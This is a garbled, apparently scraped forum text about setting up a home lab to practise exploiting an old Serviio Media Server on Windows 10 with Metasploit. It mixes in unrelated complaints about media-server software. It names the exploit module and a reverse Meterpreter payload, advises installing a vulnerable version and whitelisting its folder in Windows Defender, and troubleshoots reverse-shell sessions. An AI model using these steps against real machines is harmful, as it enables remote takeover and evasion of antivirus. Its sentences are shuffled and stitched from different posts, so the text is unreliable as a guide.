
Next, set your payload (we'll go with reverse Meterpreter shell): msf exploit(windows.) > set payload windows/meterpreter/reverse_tcp You'll see that you need to set the RHOST (your Win10 machine) and SRVHOST (your attacking machine). I would recommend temporarily whitelisting the Drive:\Program Files\Serviio\bin directory in Windows Defender because it will catch Meterpreter.įrom your attacking machine: msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec (set the exploit) I wonder if there is more user/newbie-friendly software for this. I tried Rygel, but having problems adding contents from my NAS.
#Serviio console not working install
Install Serviio Media Server on your Windows 10 box. I tried Kodi, but too complicated and slow on my old pc. I tested this with 1.7.1, so go to and copy the link for the Windows version and change current version they're serving up (1.9.1) to 1.7.1 (literally just change the 9 to a 7). Info on the Metasploit module is located here. Serviio Media Server has a command execution vulnerability in some of its older versions.

I don't know what the rules are for posting links for vulnerable software, so I'll just kind of direct you: I searched around, found, and tested a vulnerable application that you can use to practice with in Windows 10. You should only have to use multi/handler for exploits launched outside of Metasploit, but it's not clear if you're doing that or not. In order to make this work, you'll need to find a vulnerability to exploit, which will deliver the payload and make it connect back to you. Does the session die after a minute or so? Try just "exploit" without the flags and you shouldn't get the meterpreter prompt like you are now. It looks like since you're automatically backgrounding the session, you're not seeing where the session is never created. How are you connecting from the target Windows machine back to your attacking machine?


 0 kommentar(er)
0 kommentar(er)
